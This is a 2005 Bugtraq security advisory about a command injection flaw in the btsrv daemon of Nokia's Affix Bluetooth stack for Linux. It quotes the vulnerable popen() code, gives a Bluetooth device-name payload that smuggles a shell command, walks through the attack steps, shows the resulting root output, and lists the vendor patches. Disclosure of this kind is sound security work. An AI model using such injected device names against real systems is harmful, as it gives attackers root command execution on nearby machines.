Network Security Bugtraq
DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'

Subject: DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Date: Fri, 26 Aug 2005 19:03:03 -0400

DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: 
http://www.digitalmunition.com/DMA[2005-0826a].txt

Description: 
Affix is a Bluetooth protocol stack for Linux that was developed by the Nokia
Research Center in Helsinki and released under the GPL. Affix supports the core
Bluetooth protocols (HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP) and various
Bluetooth profiles. Affix consists of 'affix-kernel', which provides the kernel
modules, and 'affix', which provides the control tools, libraries, and server
daemons.

Although Nokia believes that Affix is a useful piece of software, please bear in
mind that it is not an official Nokia product, but a result of the research
activity of Nokia Research Center.

The following code snippet was found in affix-3.2.0/daemon/btsrv.c:

int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)
{
...

                err = HCI_RemoteNameRequest(fd, &dev, name);
                if (err) {
                        BTDEBUG("Name request failed: %s", hci_error(err));
...
        /* remote device name is interpolated unescaped into a shell command */
        sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));
        DBPRT("cmdline: [%s]", cmdline);
        fp = popen(cmdline, "r");
        if (!fp) {
                BTERROR("popen() failed");
                goto err;
        }
        err = fscanf(fp, "%s", pin);
        if (err == EOF) {
                BTERROR("fscanf() failed");
                pclose(fp);
                goto err;
        }

Exploitation of this bug is easier than the bluez variation of the same attack.
When exploiting bluez, the bluetooth name cache must first be populated. On
Affix, however, the call to HCI_RemoteNameRequest() fetches the remote name
on the spot, so this is an instant exploit regardless of the name cache.

The btsrv daemon should obviously be started.
root@animosity:~# btsrv
btsrv: main: btsrv started [Affix 3.2.0].
btsdpd: main: btsdpd Affix 3.2.0 started.
btsrv: start_service: Bound service Dialup Networking to port 1
btsrv: start_service: Bound service Dialup Networking Emulation to port 2
btsrv: start_service: Bound service Fax Service to port 3
btsrv: start_service: Bound service LAN Access to port 4
btsrv: start_service: Bound service OBEX File Transfer to port 5
btsrv: start_service: Bound service OBEX Object Push to port 6

As an example I will use my Ipaq 2215 to attack an Affix box. First I set the
bluetooth name of my device to ";/usr/bin/id>/tmp/ooooo;"

Next I start the attack by opening the bluetooth manager, clicking tools and
going to Paired devices. Next I click Add, search for the target host and then
double tap it. When prompted for a pin code I type in any random pin code and
press enter.

After a few moments I get an "Authentication failed!" message.

On the screen where btsrv was started I see the following error which indicates
an attack is in progress.

Traceback (most recent call last):
  File "/etc/affix/btsrv-gui", line 106, in ?
    pin = t.go("Connection from %s [%s]" %  (sys.argv[2], sys.argv[3]))
IndexError: list index out of range
sh: : command not found
btsrv: event_pin_code_request: fscanf() failed

Looking in /tmp on the target device shows successful exploitation.

root@animosity:~# ls -al /tmp/ooooo
-rw-r--r--  1 root root 134 2005-08-26 16:47 /tmp/ooooo
root@animosity:~# cat /tmp/ooooo
uid=0(root) gid=0(root) groups=0(root)

Feel free to get creative with this...
http://www.digitalmunition.com/BluezHCIDpwned.txt 

Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2

Timeline:
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed
           bad code again!
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and
           fix it also asap".
08/26/2005 btsrv popen() call patch released

Outtakes:
"no, they copied from us.." - bluez
"As far as I know, we didn't borrow code...So I guess they did then" - affix

-KF
